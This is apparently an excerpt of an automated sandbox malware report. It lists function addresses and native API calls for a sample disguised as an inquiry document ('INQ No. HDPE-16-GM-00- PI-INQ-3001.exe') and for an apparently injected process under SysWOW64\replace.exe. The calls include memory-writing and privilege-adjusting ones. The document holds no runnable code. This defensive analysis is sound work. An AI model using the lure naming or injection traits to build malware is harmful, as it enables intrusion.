                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2F60 NtCreateProcessEx,21_2_032D2F60
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2FA0 NtQuerySection,21_2_032D2FA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2F90 NtProtectVirtualMemory,21_2_032D2F90
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2E30 NtWriteVirtualMemory,21_2_032D2E30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2EA0 NtAdjustPrivilegesToken,21_2_032D2EA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2D00 NtSetInformationFile,21_2_032D2D00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2DB0 NtEnumerateKey,21_2_032D2DB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2C00 NtQueryInformationProcess,21_2_032D2C00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2CF0 NtOpenProcess,21_2_032D2CF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D2CC0 NtQueryVirtualMemory,21_2_032D2CC0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D3010 NtOpenDirectoryObject,21_2_032D3010
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D3090 NtSetValueKey,21_2_032D3090
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D3D10 NtOpenProcessToken,21_2_032D3D10
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D3D70 NtOpenThread,21_2_032D3D70
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_02957AC0 NtCreateFile,21_2_02957AC0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_02957F00 NtAllocateVirtualMemory,21_2_02957F00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_02957C20 NtReadFile,21_2_02957C20
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_02957DA0 NtClose,21_2_02957DA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_02957D10 NtDeleteFile,21_2_02957D10
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_057C1CC40_2_057C1CC4
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_057C98D00_2_057C98D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_057C01A00_2_057C01A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_057C0B600_2_057C0B60
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_057C0B500_2_057C0B50
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_057C2B110_2_057C2B11
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_057C1CB80_2_057C1CB8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_057C98C00_2_057C98C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_058A18080_2_058A1808
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_058A17F80_2_058A17F8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07869DA80_2_07869DA8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078601380_2_07860138
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078637000_2_07863700
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07862E700_2_07862E70
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07864D990_2_07864D99
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07864DA80_2_07864DA8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07868C180_2_07868C18
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078632B80_2_078632B8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078651D00_2_078651D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078651E00_2_078651E0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078601270_2_07860127
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078D9BC00_2_078D9BC0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078DC9000_2_078DC900
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078D8D100_2_078D8D10
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078DCC180_2_078DCC18
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078D7A200_2_078D7A20
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078DB9180_2_078DB918
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078D6F100_2_078D6F10
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078DF1480_2_078DF148
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078D87700_2_078D8770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078DBC880_2_078DBC88
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078D82A80_2_078D82A8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078DD8A80_2_078DD8A8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078DBED00_2_078DBED0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078D00060_2_078D0006
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078D00400_2_078D0040
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078DAA600_2_078DAA60
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004011904_2_00401190
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004032104_2_00403210
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004023134_2_00402313
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004023204_2_00402320
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004025104_2_00402510
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0040FD1A4_2_0040FD1A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0040FD234_2_0040FD23
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0042D6734_2_0042D673
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004166C34_2_004166C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004166BE4_2_004166BE
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0040FF434_2_0040FF43
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004027504_2_00402750
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0040DFC34_2_0040DFC3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F720004_2_00F72000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F981CC4_2_00F981CC
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA01AA4_2_00FA01AA
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F941A24_2_00F941A2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F681584_2_00F68158
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED01004_2_00ED0100
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7A1184_2_00F7A118
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F602C04_2_00F602C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F802744_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA03E64_2_00FA03E6
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE3F04_2_00EEE3F0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9A3524_2_00F9A352
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8E4F64_2_00F8E4F6
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F924464_2_00F92446
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F844204_2_00F84420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA05914_2_00FA0591
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE05354_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFC6E04_2_00EFC6E0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDC7C04_2_00EDC7C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE07704_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F047504_2_00F04750
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E8F04_2_00F0E8F0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC68B84_2_00EC68B8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE28404_2_00EE2840
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEA8404_2_00EEA840
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A04_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FAA9A64_2_00FAA9A6
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF69624_2_00EF6962
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA804_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F96BD74_2_00F96BD7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9AB404_2_00F9AB40
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED0CF24_2_00ED0CF2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80CB54_2_00F80CB5
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0C004_2_00EE0C00
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDADE04_2_00EDADE0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF8DBF4_2_00EF8DBF
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7CD1F4_2_00F7CD1F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEAD004_2_00EEAD00
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9EEDB4_2_00F9EEDB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9CE934_2_00F9CE93
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF2E904_2_00EF2E90
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0E594_2_00EE0E59
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9EE264_2_00F9EE26
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EECFE04_2_00EECFE0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED2FC84_2_00ED2FC8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5EFA04_2_00F5EFA0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F54F404_2_00F54F40
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F00F304_2_00F00F30
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F82F304_2_00F82F30
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F22F284_2_00F22F28
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F970E94_2_00F970E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9F0E04_2_00F9F0E0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE70C04_2_00EE70C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8F0CC4_2_00F8F0CC
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEB1B04_2_00EEB1B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FAB16B4_2_00FAB16B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F1516C4_2_00F1516C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECF1724_2_00ECF172
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F812ED4_2_00F812ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFB2C04_2_00EFB2C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE52A04_2_00EE52A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F2739A4_2_00F2739A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECD34C4_2_00ECD34C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9132D4_2_00F9132D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED14604_2_00ED1460
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9F43F4_2_00F9F43F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7D5B04_2_00F7D5B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F975714_2_00F97571
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F916CC4_2_00F916CC
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9F7B04_2_00F9F7B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE38E04_2_00EE38E0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4D8004_2_00F4D800
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE99504_2_00EE9950
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFB9504_2_00EFB950
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F759104_2_00F75910
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8DAC64_2_00F8DAC6
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F25AA04_2_00F25AA0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7DAAC4_2_00F7DAAC
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F81AA34_2_00F81AA3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F53A6C4_2_00F53A6C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9FA494_2_00F9FA49
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F97A464_2_00F97A46
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F55BF04_2_00F55BF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F1DBF94_2_00F1DBF9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EA9B804_2_00EA9B80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFFB804_2_00EFFB80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9FB764_2_00F9FB76
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9FCF24_2_00F9FCF2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F59C324_2_00F59C32
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFFDC04_2_00EFFDC0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F97D734_2_00F97D73
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F91D5A4_2_00F91D5A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE3D404_2_00EE3D40
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE9EB04_2_00EE9EB0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EA3FD24_2_00EA3FD2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EA3FD54_2_00EA3FD5
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9FFB14_2_00F9FFB1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE1F924_2_00EE1F92
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9FF094_2_00F9FF09
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335A35221_2_0335A352
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_033603E621_2_033603E6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032AE3F021_2_032AE3F0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0334027421_2_03340274
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_033202C021_2_033202C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0329010021_2_03290100
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0333A11821_2_0333A118
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0332815821_2_03328158
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_033541A221_2_033541A2
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_033601AA21_2_033601AA
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_033581CC21_2_033581CC
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0333200021_2_03332000
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A077021_2_032A0770
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032C475021_2_032C4750
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0329C7C021_2_0329C7C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032BC6E021_2_032BC6E0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A053521_2_032A0535
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0336059121_2_03360591
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0334442021_2_03344420
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335244621_2_03352446
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0334E4F621_2_0334E4F6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335AB4021_2_0335AB40
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03356BD721_2_03356BD7
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0329EA8021_2_0329EA80
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032B696221_2_032B6962
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A29A021_2_032A29A0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0336A9A621_2_0336A9A6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A284021_2_032A2840
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032AA84021_2_032AA840
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032868B821_2_032868B8
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032CE8F021_2_032CE8F0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03342F3021_2_03342F30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032E2F2821_2_032E2F28
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032C0F3021_2_032C0F30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03314F4021_2_03314F40
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0331EFA021_2_0331EFA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032ACFE021_2_032ACFE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03292FC821_2_03292FC8
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335EE2621_2_0335EE26
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A0E5921_2_032A0E59
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335CE9321_2_0335CE93
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032B2E9021_2_032B2E90
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335EEDB21_2_0335EEDB
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032AAD0021_2_032AAD00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0333CD1F21_2_0333CD1F
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032B8DBF21_2_032B8DBF
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0329ADE021_2_0329ADE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A0C0021_2_032A0C00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03340CB521_2_03340CB5
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03290CF221_2_03290CF2
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335132D21_2_0335132D
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0328D34C21_2_0328D34C
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032E739A21_2_032E739A
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A52A021_2_032A52A0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_033412ED21_2_033412ED
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032BB2C021_2_032BB2C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032D516C21_2_032D516C
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0328F17221_2_0328F172
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0336B16B21_2_0336B16B
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032AB1B021_2_032AB1B0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335F0E021_2_0335F0E0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_033570E921_2_033570E9
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A70C021_2_032A70C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0334F0CC21_2_0334F0CC
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335F7B021_2_0335F7B0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032E563021_2_032E5630
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_033516CC21_2_033516CC
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335757121_2_03357571
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0333D5B021_2_0333D5B0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335F43F21_2_0335F43F
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0329146021_2_03291460
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335FB7621_2_0335FB76
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032BFB8021_2_032BFB80
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03315BF021_2_03315BF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032DDBF921_2_032DDBF9
